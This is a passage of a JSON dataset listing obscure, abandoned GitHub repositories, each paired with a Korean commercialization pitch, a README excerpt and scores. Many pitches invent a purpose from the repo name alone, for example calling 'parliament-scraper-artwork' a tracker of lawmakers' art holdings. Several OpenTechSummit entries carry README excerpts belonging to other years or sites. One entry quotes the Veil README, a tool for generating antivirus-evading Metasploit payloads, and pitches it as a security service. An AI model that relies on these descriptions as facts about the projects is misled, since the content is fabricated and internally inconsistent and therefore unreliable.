데이터 정확성을 자동으로 확인해주는 도구로, 비즈니스에서 실수로 인한 손실을 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n금융·의료·법률 업계 고객사를 위한 문서 자동 검증 클라우드 서비스로 월 구독료 수익화\n\n**2. 내부 업무 도구**\n기업의 데이터 입력 단","readme_excerpt":"![Formally Logo](https://i.hizliresim.com/dLAVlZ.jpg)\n## Formally - Beni Oku ![GitHub last commit](https://img.shields.io/github/last-commit/arcanteus/formally)\n*Resmi ve resmi olmayan yazıları tanıyabilen Türkçe doğal dil işleme projesi*\n\n### Açıklama [![Inline docs](http://inch-ci.org/github/arcanteus/formally.svg?branch=master)](http://inch-ci.org/github/arcanteus/formally)\n\nBu uygulama elinizde elimizde veri kümelerini kullanarak kıya algoritmaları ile mevcut yazı veya yazıların resmi (formal) veya resmi olmayan (informal) olarak sınıflandırılmasını sağlamaktadır. \n\nFormally, makale, akademik e-posta veya diğer resmi yazılarınız veya yazışmalarınızda resmi olmayan ifadeleri kolayca tespit edebileceğiniz açık kaynak kodlu Türkçe doğal dil işleme projesidir.\n\n### Kurulum ![GitHub repo size](https://img.shields.io/github/repo-size/arcanteus/formally)\n* **İşletim Sistemleri:** macOS / OS X · Linux · Windows (Cygwin, MinGW, Visual Studio)\n* **Python Sürümü:** Python 2.7, 3.5+ (32/64 bit","composite_score":0.4003,"license_safety_tag":"restricted"},{"name":"loklak/loklak_artwork","github_url":"https://github.com/loklak/loklak_artwork","stars":12,"language":"","license":"LGPL-2.1","abandonment_months":89,"description":"# loklak/loklak_artwork 평가\n\n## 왜 보물인가\n소셜 미디어에서 수집한 이미지와 미디어 자료를 한곳에서 관리하고 활용할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: SNS 콘텐츠 수집 및 보관 서비스 - 마케터가 여러 플랫폼의 이미지를 자동으로 모아 브랜드 아카이브 구축\n2. **내부 업무 도구**: ","readme_excerpt":"# loklak_artwork\n\n![alt text](/website%20images/loklak_sticker_yellow.png \"loklak logo\")\n\n## Images\n\nNo | Name | Source\n---|------|-------\n1  | loklak logo | [PNG](/website%20images/loklak_sticker_yellow.png) [SVG](/svg/loklak_logo.svg) [TIF](/svg/loklak_logo.tif)\n2  | loklak yellow logo | [PNG](/png/loklak_logo_yellow.png)\n3  | loklak green logo  | [PNG](/png/loklak_logo_green.png) [SVG](/svg/loklak_logo_green.svg)\n4  | green logo background | [SVG](/svg/loklak_background_green.svg)\n5  | yellow logo background | [SVG](/svg/loklak_background_yellow.svg)\n6  | cow | [SVG](/svg/cow.svg)\n7  | loop  | [SVG](/svg/loop.svg)\n8  | sticker | [PNG](/website%20images/loklak_sticker_yellow.png) [SVG](/svg/loklak_sticker.svg)\n9  | loklak anonymous | [PNG](/website%20images/loklak_anonymous.png)\n10 | loklak collect | [PNG](/website%20images/loklak_collect.png)\n11 | loklak.org `light` | [PNG](/website%20images/loklak_org.png)\n12 | loklak.org `dark` | [PNG](/website%20images/loklak_org_black.png)\n13 | ","composite_score":0.4003,"license_safety_tag":"restricted"},{"name":"fashiontec/sewing-machines-app","github_url":"https://github.com/fashiontec/sewing-machines-app","stars":12,"language":"","license":"LGPL-3.0","abandonment_months":103,"description":"# 재봉틀 앱 상업화 분석\n\n## 왜 보물인가\n패션·의류 업계 종사자들이 재봉틀 관리와 유지보수를 효율적으로 할 수 있도록 돕는 실용적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 의류 공장·봉제소의 재봉틀 가동 시간, 유지보수 일정, 부품 교체 관리를 자동화하는 클라우드 플랫폼\n2. **내부 업무 도구**: 패션 브랜드의 내부","readme_excerpt":"# sewing-machines-app\nSewing Machine Apps\n","composite_score":0.4003,"license_safety_tag":"restricted"},{"name":"fashiontec/openwash-firmware","github_url":"https://github.com/fashiontec/openwash-firmware","stars":12,"language":"","license":"LGPL-3.0","abandonment_months":103,"description":"# OpenWash Firmware 상용화 분석\n\n## 왜 보물인가\n세탁기 같은 가전제품을 똑똑하게 제어할 수 있는 기술로, 향후 스마트 홈 시장의 핵심 기반이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **스마트 세탁 서비스**: 스마트폰 앱으로 세탁기 원격 제어 및 상태 모니터링 SaaS\n2. **가전사 펌웨어 솔루션**: LG, 삼성 같은 가전","readme_excerpt":"# openwash-firmware\nFirmware for Open Wash\n","composite_score":0.4003,"license_safety_tag":"restricted"},{"name":"OpnTec/OpenTechSummit.Asia","github_url":"https://github.com/OpnTec/OpenTechSummit.Asia","stars":12,"language":"HTML","license":"LGPL-3.0","abandonment_months":83,"description":"# OpenTechSummit.Asia 저장소 평가\n\n## 왜 보물인가\n아시아 지역의 기술 컨퍼런스 정보를 한곳에서 관리하고 공유할 수 있는 플랫폼으로, 기술 업계 전문가들의 네트워킹과 행사 홍보에 효과적입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기술 컨퍼런스 검색·예약 플랫폼으로 운영하며 월 구독료 수거\n2. **내부 업무 도구**","readme_excerpt":"# OpenTechSummit.Asia\nOpenTechSummit Asia\nhttps://opentechsummit.asia\n","composite_score":0.4003,"license_safety_tag":"restricted"},{"name":"fashiontec/openwash-android","github_url":"https://github.com/fashiontec/openwash-android","stars":12,"language":"","license":"LGPL-3.0","abandonment_months":103,"description":"# OpenWash Android 저장소 분석\n\n## 왜 보물인가\n세탁소 관리를 스마트폰으로 쉽게 할 수 있도록 만든 앱으로, 소규모 세탁업 사업자들의 업무 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 세탁소 체인점이나 프랜차이즈가 구독하는 통합 관리 플랫폼으로 제공\n2. **내부 업무 도구**: 세탁소 POS ","readme_excerpt":"# openwash-android\nOpenWash Android App\n","composite_score":0.4003,"license_safety_tag":"restricted"},{"name":"OpnTec/2014.opentechsummit.net","github_url":"https://github.com/OpnTec/2014.opentechsummit.net","stars":12,"language":"HTML","license":"GPL-3.0","abandonment_months":83,"description":"# OpnTec/2014.opentechsummit.net 분석\n\n## 왜 보물인가\n2014년 오픈테크 서밋의 웹사이트 코드로, 기술 커뮤니티 행사 운영 노하우와 참가자 관리 시스템이 담겨있어 유사 기술 컨퍼런스 개최 시 참고할 수 있는 레퍼런스입니다.\n\n## 어디에 쓸 수 있나\n1. **행사 등록 및 티켓팅 SaaS**: 기술 컨퍼런스/세미나 주최사들이 ","readme_excerpt":"# 2017.opentechsummit.net\nOpenTechSummit Meetups 2017\nhttp://2017.opentechsummit.net\n","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"fashiontec/openwash-artwork","github_url":"https://github.com/fashiontec/openwash-artwork","stars":12,"language":"","license":"LGPL-3.0","abandonment_months":103,"description":"# fashiontec/openwash-artwork 평가 보고서\n\n## 왜 보물인가\n패션 업계의 의류 세탁 관리를 위한 디지털 자산(아이콘, 가이드)을 모아놓은 오픈소스 자료실로, 누구나 자유롭게 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **세탁 관리 앱 서비스**: 의류 세탁 방법을 추천하는 모바일 앱에 제공된 아이콘과 가이드를 통합하여 ","readme_excerpt":"# openwash-artwork\nOpenWash - Artwork\n","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"OpnTec/parliament-scraper-artwork","github_url":"https://github.com/OpnTec/parliament-scraper-artwork","stars":12,"language":"","license":"GPL-3.0","abandonment_months":103,"description":"# OpnTec/parliament-scraper-artwork 사업화 분석\n\n## 왜 보물인가\n국회의원들의 예술 작품 소유 현황을 자동으로 수집하고 분석할 수 있는 도구로, 공직자 재산 투명성 관련 언론사와 시민단체들이 찾는 데이터 수집 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 언론사 SaaS 서비스**\n- 정치부 기자들이 구독해서 공직자 미술","readme_excerpt":"# parliament-scraper-artwork\nParliament Scraper Artwork\n","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"OpnTec/2017.opentechsummit.net","github_url":"https://github.com/OpnTec/2017.opentechsummit.net","stars":12,"language":"HTML","license":"GPL-3.0","abandonment_months":83,"description":"# OpnTec/2017.opentechsummit.net 분석 보고서\n\n## 왜 보물인가\n2017년 오픈테크 서밋의 웹사이트 코드로, 기술 행사 운영과 참가자 관리를 위한 검증된 시스템을 무료로 재활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **행사 관리 웹사이트 SaaS**: 컨퍼런스나 세미나 주최자들이 참가자 등록, 스케줄 공개, 강연자 정","readme_excerpt":"# 2017.opentechsummit.net\nOpenTechSummit Meetups 2017\nhttp://2017.opentechsummit.net\n","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"phimpme/phimpme-art","github_url":"https://github.com/phimpme/phimpme-art","stars":11,"language":"","license":"LGPL-3.0","abandonment_months":103,"description":"# phimpme-art 프로젝트 분석\n\n## 왜 보물인가\n사진 편집과 미술 작업을 쉽게 할 수 있는 오픈소스 도구로, 누구나 무료로 사용하고 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 기반 사진 필터·편집 플랫폼으로 개발하여 개인 크리에이터에게 월 구독 제공\n2. **내부 업무 도구**: 마케팅팀의 SNS 콘텐츠 제","readme_excerpt":"# phimpme-art\nArt made with Phimp.me\n","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"OpnTec/2012.opentechsummit.net","github_url":"https://github.com/OpnTec/2012.opentechsummit.net","stars":12,"language":"HTML","license":"GPL-3.0","abandonment_months":83,"description":"# OpnTec/2012.opentechsummit.net 분석\n\n## 왜 보물인가\n2012년 오픈테크 서밋이라는 실제 행사의 웹사이트 기반이므로, 오픈소스 커뮤니티 이벤트 운영 경험과 노하우가 담겨 있습니다.\n\n## 어디에 쓸 수 있나\n1. **컨퍼런스 플랫폼 SaaS**: 스타트업이나 중소 행사업체에 이벤트 관리 시스템으로 제공\n2. **협회·단체 내부","readme_excerpt":"# 2015.opentechsummit.net\nOpenTechSummit Meetups 2015\nhttps://2015.opentechsummit.net\n","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"fashiontec/openwash-web","github_url":"https://github.com/fashiontec/openwash-web","stars":12,"language":"","license":"LGPL-3.0","abandonment_months":103,"description":"# OpenWash Web 프로젝트 분석\n\n## 왜 보물인가\n패션 산업의 의류 세탁 정보를 디지털화하여 소비자가 올바른 세탁 방법을 쉽게 찾을 수 있게 만든 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 의류 판매 플랫폼** - 상품 페이지에 세탁 가이드를 자동으로 표시하는 기능\n2. **세탁소 관리 시스템** - 고객이 의류 종류별 세탁 방법을","readme_excerpt":"# openwash-web\nOpenWash - Web App\n","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"fashiontec/openwash-hardware","github_url":"https://github.com/fashiontec/openwash-hardware","stars":12,"language":"","license":"LGPL-3.0","abandonment_months":103,"description":"# OpenWash Hardware 프로젝트 분석\n\n## 왜 보물인가\n세탁기 같은 일상용 가전제품을 스마트하게 만들어 원격으로 제어하고 모니터링할 수 있는 기술로, 공동생활 시설이나 세탁소의 운영 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기숙사/오피스텔 관리 SaaS**: 세탁기 사용 현황을 실시간으로 추적하고 예약 시스템을 제공","readme_excerpt":"# openwash-hardware\nOpenWash Hardware Schematics\n","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"ffii/FFII-Labs","github_url":"https://github.com/ffii/FFII-Labs","stars":11,"language":"HTML","license":"LGPL-3.0","abandonment_months":76,"description":"# FFII-Labs 사업화 분석\n\n## 왜 보물인가\n금융 데이터 분석과 자산 매칭을 자동화하는 기술로, 수작업으로 처리하던 복잡한 재무 업무를 빠르고 정확하게 처리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 회계사무소 SaaS 서비스**\n중소 회계사무소에 클라우드 기반 자산 매칭 도구를 월 구독료로 판매하여 수작업 시간을 50% 단축시킬 수 있","readme_excerpt":"# FFII-Labs\nFFII Labs\n","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"OpnTec/2015.opentechsummit.net","github_url":"https://github.com/OpnTec/2015.opentechsummit.net","stars":12,"language":"HTML","license":"GPL-3.0","abandonment_months":83,"description":"# OpnTec/2015.opentechsummit.net 분석\n\n## 왜 보물인가\n2015년 오픈 테크 서밋의 공식 웹사이트 소스 코드로, 대규모 기술 행사의 디지털 인프라를 그대로 활용할 수 있는 검증된 템플릿입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 컨퍼런스 및 기술 행사 온라인 플랫폼 제공 서비스\n- **내부 업무 도구**: 기","readme_excerpt":"# 2015.opentechsummit.net\nOpenTechSummit Meetups 2015\nhttps://2015.opentechsummit.net\n","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"OpnTec/2013.opentechsummit.net","github_url":"https://github.com/OpnTec/2013.opentechsummit.net","stars":12,"language":"HTML","license":"GPL-3.0","abandonment_months":83,"description":"# OpnTec/2013.opentechsummit.net 분석\n\n## 왜 보물인가\n2013년 오픈테크 서밋의 웹사이트 코드로, 개발자 커뮤니티 행사 운영의 실제 사례를 담고 있어 기술 행사를 기획하는 단체에게 참고 가치가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기술 컨퍼런스 웹사이트 SaaS**: 행사 주최사들이 구독해서 자신의 행사 웹사이트를 만","readme_excerpt":"# 2016.opentechsummit.net\nOpenTechSummit 2016\nhttps://2016.opentechsummit.net\n","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"blackhatethicalhacking/Veil","github_url":"https://github.com/blackhatethicalhacking/Veil","stars":8,"language":"","license":"GPL-3.0","abandonment_months":83,"description":"# Veil 저장소 분석\n\n## 왜 보물인가\n보안 전문가들이 침입 테스트(시스템 약점 찾기)를 할 때 탐지를 피하면서 작업하는 데 필요한 도구를 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **보안 컨설팅 회사 내부 도구**: 의뢰받은 기업의 보안 약점을 찾아주는 서비스에 활용\n2. **기업 정보보안팀용 SaaS**: 자사 시스템이 실제 공격에 얼마나 취약","readme_excerpt":"# Veil\n\n![Veil Logo](https://www.veil-framework.com/wp-content/uploads/2013/12/cropped-Veil-Symbol2.png \"Veil Logo\")\n\nVeil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions.\n\nVeil is current under support by @ChrisTruncer\n\n- - -\n\n## Software Requirements:\n\nThe following OSs are officially supported:\n\n- Debian 8+\n- Kali Linux Rolling 2018.1+\n\nThe following OSs are likely able to run Veil:\n\n- Arch Linux\n- BlackArch Linux\n- Deepin 15+\n- Elementary\n- Fedora 22+\n- Linux Mint\n- Parrot Security\n- Ubuntu 15.10+\n- Void Linux\n\n## Setup\n\n### Kali's Quick Install\n\n```bash\napt -y install veil\n/usr/share/veil/config/setup.sh --force --silent\n```\n\n### Git's Quick Install\n\n**NOTE**:\n- Installation must be done with superuser privileges. If you are not using the root account (as default with Kali Linux), prepend commands with `sudo` or change to the root user before beginning.\n- Your package manager may be different to `apt`. You will also need an X server runni","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"Kreijstal/open-event-webapp","github_url":"https://github.com/Kreijstal/open-event-webapp","stars":11,"language":"JavaScript","license":"GPL-3.0","abandonment_months":96,"description":"# Kreijstal/open-event-webapp 분석\n\n## 왜 보물인가\n행사나 컨퍼런스를 웹사이트로 쉽게 만들고 관리할 수 있는 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **행사 운영 SaaS**: 중소 컨퍼런스나 세미나 주최자들이 구독해서 자동으로 행사 웹사이트를 생성하고 참가자를 관리하는 서비스\n2. **기업 내부 도구**: 대기업","readme_excerpt":"# Open Event Web App\n![Open Event webapp](https://storage.googleapis.com/eventyay.com/assets/branding/webapp_branding.png)\n\n[![Build Status](https://travis-ci.org/fossasia/open-event-webapp.svg?branch=development)](https://travis-ci.org/fossasia/open-event-webapp?branch=development)\n[![Heroku](https://heroku-badge.herokuapp.com/?app=opev-webgen-dev)](http://opev-webgen-dev.herokuapp.com)\n[![Dependencies](https://david-dm.org/fossasia/open-event-webapp.svg)](https://david-dm.org/fossasia/open-event-webapp)\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/c5b7e2ca3e4640c9b38e2f3274072583)](https://www.codacy.com/app/dev_19/open-event-webapp?utm_source=github.com&amp;utm_medium=referral&amp;utm_content=fossasia/open-event-webapp&amp;utm_campaign=Badge_Grade)\n[![Code Climate](https://codeclimate.com/github/fossasia/open-event-webapp/badges/gpa.svg?branch=development)](https://codeclimate.com/github/fossasia/open-event-webapp)\n[![codecov](https://codecov.io/gh/fossasia/open-event","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"fashiontec/sewing-machine-firmware","github_url":"https://github.com/fashiontec/sewing-machine-firmware","stars":12,"language":"","license":"LGPL-3.0","abandonment_months":103,"description":"# fashiontec/sewing-machine-firmware 분석 보고서\n\n## 왜 보물인가\n재봉틀을 스마트 기기처럼 제어할 수 있게 하는 소프트웨어로, 기존 재봉틀을 현대화하고 자동화할 수 있는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **스마트 재봉틀 SaaS 플랫폼**: 재봉틀 사용자들이 휴대폰 앱으로 바느질 패턴을 설계하고 저장할 수","readme_excerpt":"# sewing-machine-firmware\nFirmware for Sewing Machines\n","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"OpnTec/2010.opentechsummit.net","github_url":"https://github.com/OpnTec/2010.opentechsummit.net","stars":12,"language":"HTML","license":"GPL-3.0","abandonment_months":79,"description":"# OpnTec/2010.opentechsummit.net 분석 보고서\n\n## 왜 보물인가\n2010년 오픈 테크 서밋의 웹사이트 아카이브로, 초창기 오픈소스 커뮤니티의 역사와 기술 트렌드를 기록한 귀중한 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **오픈소스 역사 아카이브 SaaS**: 초기 오픈소스 운동의 발전 과정을 담은 온라인 박물관 형태의 구독 서","readme_excerpt":"# 2020.opentechsummit.cn\nOpenTechSummit China 2020\nhttps://2020.opentechsummit.cn\n","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"fashiontec/fashiontec-artwork","github_url":"https://github.com/fashiontec/fashiontec-artwork","stars":12,"language":"","license":"GPL-3.0","abandonment_months":103,"description":"# fashiontec-artwork 저장소 분석\n\n## 왜 보물인가\n패션 디자인 업계에서 필요한 미술 자료와 디자인 소스를 누구나 자유롭게 사용할 수 있도록 공개한 드문 자산 모음입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 패션 디자인 SaaS 플랫폼**\n온라인 의류 디자인 도구에 이 자료를 기본 템플릿으로 제공하여 초보자도 쉽게 옷 디자인을 시작할 수","readme_excerpt":"# fashiontec-artwork\nFashiontec Artwork\n","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"fashiontec/openwash-server","github_url":"https://github.com/fashiontec/openwash-server","stars":12,"language":"","license":"LGPL-3.0","abandonment_months":103,"description":"# OpenWash Server 평가 보고서\n\n## 왜 보물인가\n세탁소나 드라이클리닝 가게들이 고객 관리, 주문 추적, 결제를 한 곳에서 할 수 있는 자동화 시스템입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 세탁소 체인점들을 위한 클라우드 기반 관리 플랫폼으로 월 구독료를 받고 제공\n2. **내부 업무 도구**: 중소 세탁업체들이 자","readme_excerpt":"# openwash-server\nOpenWash Backend API Server\n","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"TFC-343/Mandelbrot","github_url":"https://github.com/TFC-343/Mandelbrot","stars":7,"language":"Python","license":"LGPL-3.0","abandonment_months":79,"description":"# TFC-343/Mandelbrot 보물 평가\n\n## 왜 보물인가\n복잡한 수학적 패턴을 시각적으로 표현하고 분석할 수 있는 도구로, 과학·교육·예술 분야에서 광범위하게 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 수학 및 과학 개념을 인터랙티브하게 가르치는 SaaS 서비스\n2. **3D 그래픽 렌더링 API**: 디자","readme_excerpt":"# Mandelbrot\nMandelbrot code\n\nThis code needs needs python and numpy\n\nThanks to all those on reddit for who were interested in my code, so here it is.\n\nIn testing it took about 30-60 seconds to render but the Tk can crash if there are too many pixels in the canvas,\n\ton line 13 in main.py there is a var called 'pixels' chaging this will change how many different pixels there are on the screen.\n\n\n\t- TFC(James Packham)\n\t\t(with help from Austin T Schaffer)\n\nPs. please don’t steal my code\n","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"phimpme/labs.phimp.me","github_url":"https://github.com/phimpme/labs.phimp.me","stars":11,"language":"","license":"LGPL-3.0","abandonment_months":103,"description":"# phimpme/labs.phimp.me 분석 보고서\n\n## 왜 보물인가\n사진 편집과 관련된 실험적 기능들을 모아놓은 프로젝트로, 새로운 이미지 처리 기술을 테스트하고 발전시킬 수 있는 기반을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 사진 편집 서비스**: 웹에서 직접 사진을 보정하고 필터를 적용할 수 있는 구독형 플랫폼\n2. **스마트폰 ","readme_excerpt":"# labs.phimp.me\nPhimp.me Labs\n","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"OpnTec/2016.opentechsummit.net","github_url":"https://github.com/OpnTec/2016.opentechsummit.net","stars":12,"language":"HTML","license":"GPL-3.0","abandonment_months":83,"description":"# OpnTec/2016.opentechsummit.net 분석\n\n## 왜 보물인가\n2016년 오픈테크 서밋이라는 큰 행사의 공식 웹사이트 코드로, 수천 명의 참가자를 처리한 검증된 이벤트 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n- **컨퍼런스 플랫폼 SaaS**: 기업들이 월 $299-$999에 구독하여 자체 개발자 행사/세미나를 온라인으로 개최\n- *","readme_excerpt":"# 2016.opentechsummit.net\nOpenTechSummit 2016\nhttps://2016.opentechsummit.net\n","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"fashiontec/bodyapps-artwork","github_url":"https://github.com/fashiontec/bodyapps-artwork","stars":12,"language":"","license":"GPL-3.0","abandonment_months":103,"description":"# fashiontec/bodyapps-artwork 프로젝트 분석\n\n## 왜 보물인가\n패션 업계에서 고객의 체형에 맞춘 옷을 가상으로 입혀볼 수 있는 기술로, 온라인 쇼핑에서 옷 사이즈 맞춤 문제를 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 의류 판매 플랫폼**: 고객이 구매 전 자신의 체형에 맞춰 옷을 가상으로 입어보는 기능\n2. ","readme_excerpt":"# bodyapps-artwork\nBody Apps - Artwork\n","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"OpnTec/2018.opentechsummit.in","github_url":"https://github.com/OpnTec/2018.opentechsummit.in","stars":12,"language":"HTML","license":"LGPL-3.0","abandonment_months":83,"description":"# OpnTec/2018.opentechsummit.in 분석 보고서\n\n## 왜 보물인가\n2018년 오픈테크 정상회담의 웹사이트 코드로, 대규모 기술 컨퍼런스 운영 경험과 노하우가 담겨 있어 유사한 행사를 준비하는 조직들의 소중한 참고 자료입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 컨퍼런스 관리 SaaS 서비스**\n행사 등록, 시간표 관리, 연사자 정보","readme_excerpt":"# opentechsummit.in\nOpenTechSummit India\n","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"Kreijstal/Public-Code","github_url":"https://github.com/Kreijstal/Public-Code","stars":11,"language":"JavaScript","license":"GPL-3.0","abandonment_months":47,"description":"# Kreijstal/Public-Code 분석\n\n## 왜 보물인가\n저장소의 설명이 없어 구체적인 가치를 판단하기 어렵지만, GPL-3.0 라이선스의 공개 코드라는 점에서 투명성 있는 기술 솔루션으로 보입니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 기업의 데이터 처리나 자동화 프로세스를 위한 커스텀 솔루션으로 도입\n2. **SaaS 서비","readme_excerpt":"# Public Money Public Code – publiccode.asia\n\n[![Build Status](https://travis-ci.org/fossasia/publiccode.asia.svg?branch=master)](https://travis-ci.org/fossasia/publiccode.asia)\n\nThis is the website of \"Public Money, Public Code\" [publiccode.asia](https://publiccode.asia). It is based on [Hugo](https://gohugo.io).\n\n\n## Table of Contents\n\n- [Contribute](#contribute)\n- [Translate](#translate)\n- [Build](#build)\n- [HowTos and FAQs](#howtos-and-faqs)\n- [Licence](#licence)\n\n\n## Contribute\n\n### Prerequisites\n\nIn order to modify the website, you need `hugo` and `git` installed on your\ncomputer. If Hugo isn't available in your package manager, obtain it from its\n[official website](https://gohugo.io). We tested the website build with Hugo\nfrom version 0.20.7 upwards. Please make sure that you use an as recent version\nas possible to avoid errors.\n\n## Issue and Branch Policy\n\nBefore making a pull request, please file an issue. So, other developers have the chance to give feedback or discuss detail","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"fashiontec/openwash-format","github_url":"https://github.com/fashiontec/openwash-format","stars":12,"language":"","license":"LGPL-3.0","abandonment_months":103,"description":"# OpenWash Format 상용화 분석\n\n## 왜 보물인가\n세탁 산업의 표준화된 정보 형식을 제공하여, 의류 관리와 세탁 지침을 누구나 쉽게 이해하고 공유할 수 있게 만든 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **세탁 지침 자동 변환 SaaS**: 의류 제조업체가 자신의 제품 정보를 입력하면 자동으로 여러 언어와 형식의 세탁 라벨을 생성해주는 ","readme_excerpt":"# openwash-format\nOpenWash - Format and Specs\n","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"Kreijstal/open-event-api","github_url":"https://github.com/Kreijstal/open-event-api","stars":11,"language":"Python","license":"GPL-3.0","abandonment_months":95,"description":"# Kreijstal/open-event-api 평가\n\n## 왜 보물인가\n행사와 이벤트 정보를 손쉽게 관리하고 공유할 수 있는 기술로, 콘서트·학회·전시회 등 다양한 행사 주최자들의 업무 효율을 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 이벤트 플래너를 위한 클라우드 기반 행사관리 플랫폼으로 월간 구독 서비스 제공\n2. *","readme_excerpt":"# Open Event Server\n\n![Open Event Server](https://storage.googleapis.com/eventyay.com/assets/branding/server_branding.png)\n\n[![GitHub release](https://img.shields.io/badge/release-1.0.0--alpha.10-blue.svg?style=flat-square)](https://github.com/fossasia/open-event-server/releases/latest)\n[![Travis branch](https://api.travis-ci.org/fossasia/open-event-server.svg?branch=master&style=flat-square)](https://travis-ci.org/fossasia/open-event-server)\n[![Gemnasium](https://gemnasium.com/fossasia/open-event-server.svg?style=flat-square)](https://gemnasium.com/github.com/fossasia/open-event-server)\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/1ac554483fac462797ffa5a8b9adf2fa?style=flat-square)](https://www.codacy.com/app/fossasia/open-event-orga-server)\n[![Codecov branch](https://codecov.io/gh/fossasia/open-event-server/branch/master/graph/badge.svg?style=flat-square)](https://codecov.io/gh/fossasia/open-event-orga-server)\n[![Gitter](https://img.shields.io/badge/chat-on%20gitter-ff","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"OpnTec/2018.opentechsummit.net","github_url":"https://github.com/OpnTec/2018.opentechsummit.net","stars":12,"language":"HTML","license":"LGPL-3.0","abandonment_months":83,"description":"# OpnTec/2018.opentechsummit.net 평가 보고서\n\n## 왜 보물인가\n2018년 개최된 공개 기술 행사의 웹사이트 코드로, 대규모 기술 컨퍼런스 운영 노하우를 담은 오픈소스 템플릿입니다.\n\n## 어디에 쓸 수 있나\n1. **컨퍼런스 운영 SaaS**: 행사 주최자들이 자신의 컨퍼런스 웹사이트를 빠르게 만들 수 있는 템플릿 서비스\n2. ","readme_excerpt":"# opentechsummit.in\nOpenTechSummit India\n","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"OpnTec/2011.opentechsummit.net","github_url":"https://github.com/OpnTec/2011.opentechsummit.net","stars":12,"language":"HTML","license":"GPL-3.0","abandonment_months":81,"description":"# OpnTec/2011.opentechsummit.net 분석\n\n## 왜 보물인가\n2011년 오픈테크 서밋의 웹사이트 코드로, 초기 기술 커뮤니티 행사 운영 노하우와 웹사이트 구축 방식이 담긴 역사적 자료입니다.\n\n## 어디에 쓸 수 있나\n- **행사 관리 플랫폼**: 컨퍼런스나 세미나 웹사이트 구축 템플릿으로 활용하여 행사 주최자에게 빠른 구축 솔루션 ","readme_excerpt":"# 2019.opentechsummit.net\nOpenTechSummit Meetups 2019\nhttps://2019.opentechsummit.net\n","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"fashiontec/knit-format","github_url":"https://github.com/fashiontec/knit-format","stars":12,"language":"","license":"LGPL-3.0","abandonment_months":103,"description":"# fashiontec/knit-format 분석\n\n## 왜 보물인가\n니트 제품의 설계와 생산 과정을 표준화된 형식으로 관리할 수 있는 도구로, 패션 업체들의 복잡한 제작 데이터를 간단하게 정리해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 의류 제조업체를 위한 구독형 니트 설계 관리 플랫폼\n2. **내부 업무 도구**: 대형 패션","readme_excerpt":"# knit-format\nKnit Format\n","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"fashiontec/labs.fashiontec.org","github_url":"https://github.com/fashiontec/labs.fashiontec.org","stars":12,"language":"","license":"GPL-3.0","abandonment_months":103,"description":"# fashiontec/labs.fashiontec.org 분석\n\n## 왜 보물인가\n패션 산업의 기술 혁신을 위해 누군가 7년 동안 지속적으로 개발해온 플랫폼으로, 의류 제조·유통 과정을 디지털화할 수 있는 기반이 마련되어 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **패션 기업 관리 SaaS**: 중소 의류 제조사들이 월 구독으로 제품 기획부터 생산까지","readme_excerpt":"# 